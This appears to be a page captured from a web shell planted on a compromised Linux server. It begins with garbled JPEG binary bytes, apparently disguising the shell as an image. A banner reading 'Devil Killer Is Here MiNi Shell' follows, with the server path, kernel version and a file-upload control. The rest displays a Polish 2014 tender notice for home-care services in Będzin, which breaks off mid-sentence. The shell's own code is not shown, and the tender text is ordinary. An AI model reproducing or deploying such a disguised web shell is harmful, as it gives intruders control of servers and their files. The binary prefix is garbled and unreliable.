JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141205/400282-N-2014.html

<p class="kh_header"><b>Będzin: Świadczenie usług opiekuńczych dla osób wymagających pomocy Miejskiego Ośrodka Pomocy Społecznej w Będzinie wykonywanych w miejscu zamieszkania tych osób</b><br>
<b>Numer ogłoszenia: 400282 - 2014; data zamieszczenia: 05.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 11 Listopada 1, 42-500 Będzin, woj. śląskie, tel. 032 2674982; 7614760, 61, faks 032 2674982, 7614760, 7614761.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ----------</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług opiekuńczych dla osób wymagających pomocy Miejskiego Ośrodka Pomocy Społecznej w Będzinie wykonywanych w miejscu zamieszkania tych osób.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia obejmuje trzy zadania (części) zamówienia, 
na które składają się:	 
1)	Zadanie nr 1 (część nr 1 zamówienia) - świadczenie usług opiekuńczo - gospodarczych dla osób dorosłych wymagających pomocy Miejskiego Ośrodka Pomocy Społecznej 
w Będzinie wykonywanych w miejscu zamieszkania tych osób, obejmujących pomoc 
w zaspokajaniu codziennych potrzeb życiowych, opiekę higieniczną, zalecaną przez lekarza pielęgnację oraz w miarę możliwości zapewnienie kontaktów z otoczeniem. Przewidywana ilość godzin do wykonania - maksymalnie 6.500  godzin zegarowych miesięcznie, to jest 78.000 godzin zegarowych w skali 12 miesięcy,
przy czym Wykonawcy nie przysługuje roszczenie zlecenia maksymalnej liczby godzin.
2)	Zadanie nr 2 (część nr 2 zamówienia) - świadczenie specjalistycznych usług opiekuńczych dla dzieci, młodzieży i osób dorosłych, z wyłączeniem specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi, wymagających pomocy Miejskiego Ośrodka Pomocy Społecznej w Będzinie wykonywanych w miejscu zamieszkania tych osób -  przewidywana ilość godzin do wykonania - maksymalnie 292 godzin zegarowych miesięcznie, to jest 3.504 godzin zegarowych w skali 12 miesięcy, przy czym Wykonawcy nie przysługuje roszczenie zlecenia maksymalnej liczby godzin.
3)	Zadanie nr 3 (część nr 3 zamówienia) -  świadczenie specjalistycznych usług opiekuńczych dla dzieci, młodzieży i osób dorosłych z zaburzeniami psychicznymi, wymagających pomocy Miejskiego Ośrodka Pomocy Społecznej w Będzinie wykonywanych w miejscu zamieszkania tych osób - przewidywana ilość godzin 
do wykonania - maksymalnie 585 godzin zegarowych miesięcznie, to jest 7.020 godzin zegarowych w skali 12 miesięcy, przy czym Wykonawcy nie przysługuje roszczenie zlecenia maksymalnej liczby godzin.
Zamawiający zastrzega sobie prawo zmiany ilości godzin przedmiotu niniejszego zamówienia w zależności od wysokości posiadanych środków w roku budżetowym 2015 
oraz w zależności od potrzeb wynikających ze zmiennej liczby osób kwalifikujących się 
do danego rodzaju usług objętych przedmiotem niniejszego zamówienia. 
W przypadku zlecenia niepełnej liczby godzin, Wykonawcy będzie przysługiwać wyłącznie wynagrodzenie za faktycznie zrealizowane usługi i nie będzie on zgłaszać roszczeń 
co do realizacji pozostałej części zmówienia. Minimalny wymiar godzin świadczonych usług w pełnym okresie realizacji przedmiotu niniejszego zamówienia wynosi:
1)	62.500 godzin - w przypadku Zadania nr 1 (części nr 1 zamówienia),
2)	2.800 godzin - w przypadku Zadania nr 2 (części nr 2 zamówienia),
3)	5.600 godzin - w przypadku Zadania nr 3 (części nr 3 zamówienia).
Szczegółowe informacje dotyczące opisu, zakresu i warunków realizacji przedmiotu zamówienia określa Rozdział II SIWZ - Opis i określenie przedmiotu zamówienia
oraz wzór umowy stanowiący załącznik nr 7 do Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, 
o których mowa w  art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2013 r., poz. 907 ze zm.), zgodnych z przedmiotem niniejszego zamówienia, to jest zgodnych z przedmiotem zamówienia podstawowego:
1) w okresie 3 lat od udzielenia zamówienia podstawowego,
2) dotychczasowemu wykonawcy usług,
3) stanowiących:
a) nie więcej niż 30 % wartości zamówienia podstawowego, w przypadku usług objętych przedmiotem niniejszego zamówienia, o których mowa w ust. 1 pkt 1 
oraz ust. 2 Rozdziału II SIWZ,
b) nie więcej niż 30 % wartości zamówienia podstawowego, w przypadku usług objętych przedmiotem niniejszego zamówienia, o których mowa w ust. 1 pkt 2 
oraz ust. 3 Rozdziału II SIWZ,
c) nie więcej niż 30 % wartości zamówienia podstawowego, w przypadku usług objętych przedmiotem niniejszego zamówienia, o których mowa w ust. 1 pkt 3 oraz ust. 4 Rozdziału II SIWZ,
4) polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku posiadania uprawnień 
do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w przypadku gdy Wykonawca ten oświadczy, 
że posiada uprawnienia do wykonywania określonej działalności lub czynności, 
jeżeli przepisy prawa nakładają obowiązek ich posiadania, składając oświadczenie 
według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku posiadania wiedzy 
i doświadczenia, jeżeli ten wykaże, że w okresie ostatnich trzech lat /* przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie:
1)	dla zadania nr 1 (części nr 1 niniejszego zamówienia) - wykonał co najmniej 
1 główną usługę obejmującą swoim rodzajem świadczenie usług opiekuńczo - gospodarczych dla osób dorosłych w miejscu ich zamieszkania w ilości 
nie mniejszej niż 30.000 godzin maksymalnie w skali 12 miesięcy,
2)	dla zadania nr 2 (części nr 2 niniejszego zamówienia) - wykonał co najmniej 
1 główną usługę obejmującą swoim rodzajem świadczenie specjalistycznych usług opiekuńczych dla dzieci, młodzieży i osób dorosłych w miejscu ich zamieszkania z wyłączeniem specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w ilości nie mniejszej niż 1.400 godzin maksymalnie w skali 
12 miesięcy,
3)	dla zadania nr 3 (części nr 3 niniejszego zamówienia) - wykonał co najmniej 
1 główną usługę obejmującą swoim rodzajem świadczenie specjalistycznych usług opiekuńczych dla dzieci, młodzieży i osób dorosłych z zaburzeniami psychicznymi 
w miejscu ich zamieszkania w ilości nie mniejszej niż 2.800 godzin maksymalnie 
w skali 12 miesięcy -
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, 
na rzecz których usługi te zostały wykonane oraz załączy dowody potwierdzające, 
czy każda z tych usług została wykonana lub w przypadku świadczeń okresowych 
lub ciągłych jest wykonywana należycie /**, zamieszczając przedmiotowe informacje 
w Wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych - również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie stanowiącym załącznik nr 5 do SIWZ.
Dowodami potwierdzającymi, czy usługi zostały wykonane lub są wykonywane należycie mogą być wyłącznie:
a)	poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
b)	oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w lit. a powyżej (w takim przypadku Wykonawca zobowiązany 
jest wskazać obiektywne przyczyny uniemożliwiające uzyskanie przedmiotowego poświadczenia).
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi 
wskazane w Wykazie wykonanych, a w przypadku świadczeń okresowych 
lub ciągłych - wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. W razie konieczności, szczególnie gdy Wykaz lub dowody, o których mowa powyżej budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, 
że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.

/*  okres ostatnich trzech lat nie dotyczy lat kalendarzowych, przy obliczaniu tego terminu należy stosować art. 112 ustawy z dnia 23 kwietnia 1964 roku Kodeks cywilny, zgodnie z którym termin oznaczony w latach kończy się z upływem dnia, który nazwą lub datą odpowiada początkowemu dniowi terminu.

/** należy wypełnić wszystkie pozycje formularza - Wykaz wykonanych, 
a w przypadku świadczeń okresowych lub ciągłych - również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie stanowiącego załącznik nr 5 do SIWZ, podając w każdej wypełnionej pozycji formularza:
- nazwę - przedmiot usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia dla zadania (części zamówienia), 
na którą lub które Wykonawca składa ofertę - w celu potwierdzenia warunku udziału w postępowaniu dotyczącego wiedzy i doświadczenia - 
wykonanej w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
-   liczbę godzin wykonanej usługi w skali 12 miesięcy,
  -  wartość usługi w złotych brutto, Jeżeli kwoty w przedłożonych przez Wykonawcę dokumentach określone będą w walucie innej niż w złotych polskich  Zamawiający dokona ich przeliczenia na polskie złote według Tabeli kursów średnich walut obcych ogłoszonego przez Narodowy Bank Polski obowiązującej na dzień opublikowania ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych,
  - datę wykonania każdej usługi, a  w przypadku świadczeń okresowych 
 lub ciągłych - datę wykonywania każdej usługi  (od - dzień, miesiąc, rok 
do - dzień, miesiąc rok),
- odbiorcę usługi - podmiot, na rzecz którego usługa została wykonana 
lub jest wykonywana (nazwę podmiotu zlecającego usługę, adres oraz telefon kontaktowy),
- nazwę dowodu potwierdzającego, że usługa ta została wykonana 
należycie lub w przypadku świadczeń okresowych lub ciągłych 
jest wykonywana należycie - (należy nazwać ten dokument, np. referencja, rekomendacja, poświadczenie), przy czym dokument ten, z zastrzeżeniem lit. a powyżej, powinien być wystawiony przez osobę trzecią - podmiot zlecający usługę oraz dotyczyć wyłącznie usług obejmujących swoim rodzajem przedmiot niniejszego zamówienia, to jest usług w zakresie cateringu obejmujących przygotowywanie i dostarczanie posiłków, dokument należy załączyć do oferty oraz podać numer strony, którym dokument jest oznaczony w ofercie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym, jeśli Wykonawca ten oświadczy, że dysponuje odpowiednim 
do wykonania zamówienia potencjałem technicznym, składając oświadczenie według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania osobami zdolnymi do wykonania zamówienia, jeśli Wykonawca ten dysponuje lub na czas realizacji zamówienia będzie dysponował:
1)	dla zadania nr 1 (części nr 1 niniejszego zamówienia) -  co najmniej 30 osobami, 
które będą uczestniczyć w wykonaniu zamówienia, przy czym każda z tych osób winna spełniać łącznie niżej wymienione warunki:
a)	posiada dyplom zawodowy uprawniający do posługiwania się tytułem opiekunki środowiskowej, asystenta osoby niepełnosprawnej, asystenta medycznego, pielęgniarki, opiekuna osoby starszej, opiekuna medycznego, opiekuna w domu pomocy społecznej (standard optymalny), bądź ukończone szkolenie (kurs) siostry PCK lub ukończone szkolenie (kurs) dla opiekunów środowiskowych lub ukończone szkolenie (kurs) opiekuna osoby starszej lub ukończone szkolenie (kurs) w zakresie świadczenia usług opiekuńczych, przy czym Zamawiający wymaga, by wymiar każdego z ukończonych szkoleń (kursów) wynosił co najmniej 50 godzin lekcyjnych (standard minimalny),
b)	posiada udokumentowaną co najmniej półroczną praktykę (w tym wolontarystyczną) lub co najmniej półroczny staż pracy w świadczeniu usług opiekuńczo - gospodarczych - odbyte w jednostkach świadczących usługi opiekuńczo - gospodarcze, w środowisku zamieszkania lub w ośrodkach wsparcia dla osób starszych i osób niepełnosprawnych, w domach pomocy społecznej, rodzinnych domach pomocy, hospicjach, itp.;
2)	dla zadania nr 2 (części nr 2 niniejszego zamówienia) - co najmniej 3 osobami, 
które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat 
ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia zgodnie 
z rozporządzeniem Ministra Polityki Społecznej z dnia 22 września 2005 roku w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r. Nr 189 poz. 1598 ze zmianą 
z dnia 6 lipca 2006 r., Dz. U. Nr 134 poz. 943), w szczególności:
a)	1 osobą posiadającą kwalifikacje do wykonywania zawodu psychologa;
b)	1 osobą posiadającą kwalifikacje do wykonywania zawodu pedagoga;
c)	1 osobą posiadającą kwalifikacje do wykonywania zawodu specjalisty w zakresie rehabilitacji medycznej;
3)	dla zadania nr 3 (części nr 3 niniejszego zamówienia) - co najmniej 8 osobami, 
które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat 
ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia zgodnie 
z rozporządzeniem Ministra Polityki Społecznej z dnia 22 września 2005 roku w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r. Nr 189 poz. 1598 ze zmianą 
z dnia 6 lipca 2006 r., Dz. U. Nr 134 poz. 943), w szczególności:
a)	2 osobami posiadającymi kwalifikacje do wykonywania zawodu psychologa, 
oraz co najmniej półroczny staż pracy w jednej z następujących jednostek - szpitalu psychiatrycznym lub jednostce organizacyjnej pomocy społecznej dla osób 
z zaburzeniami psychiatrycznymi lub placówce terapii lub placówce oświatowej, 
do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym lub ośrodku terapeutyczno - edukacyjno - wychowawczym lub zakładzie rehabilitacji. Ponadto osoba musi posiadać udokumentowane przeszkolenie w zakresie prowadzenia treningów umiejętności społecznych przewidzianych w zakresie specjalistycznych usług;
b)	2 osobami posiadającymi kwalifikacje do wykonywania zawodu pedagoga 
oraz co najmniej półroczny staż pracy w jednej z następujących jednostek - szpitalu psychiatrycznym lub jednostce organizacyjnej pomocy społecznej dla osób 
z zaburzeniami psychiatrycznymi lub placówce terapii lub placówce oświatowej, 
do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym lub ośrodku terapeutyczno -edukacyjno - wychowawczym lub zakładzie rehabilitacji. Ponadto osoba musi posiadać udokumentowane przeszkolenie w zakresie prowadzenia treningów umiejętności społecznych przewidzianych w zakresie specjalistycznych usług;
c)	4 osobami posiadającymi kwalifikacje do wykonywania zawodu pielęgniarki psychiatrycznej oraz co najmniej półroczny staż pracy w jednej z następujących jednostek - szpitalu psychiatrycznym lub jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychiatrycznymi lub placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym lub ośrodku terapeutyczno - edukacyjno - wychowawczym lub zakładzie rehabilitacji. Ponadto osoba musi posiadać udokumentowane przeszkolenie w zakresie prowadzenia treningów umiejętności społecznych przewidzianych w zakresie specjalistycznych usług - 
co wykaże w formularzu - Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 6 do SIWZ, wypełniając wszystkie jego pozycje.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku znajdowania się w odpowiedniej sytuacji ekonomicznej i finansowej, jeżeli ten oświadczy, że znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, składając oświadczenie według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz oferty (wzór formularza stanowi załącznik nr 1 do SIWZ),
2) Pełnomocnictwo do reprezentowania Wykonawcy, o którym mowa w Rozdziale IX ust. 5 SIWZ, o ile ofertę składa pełnomocnik.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie zawodowe osób, które będą uczestniczyć w wykonywaniu zamówienia - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy, 
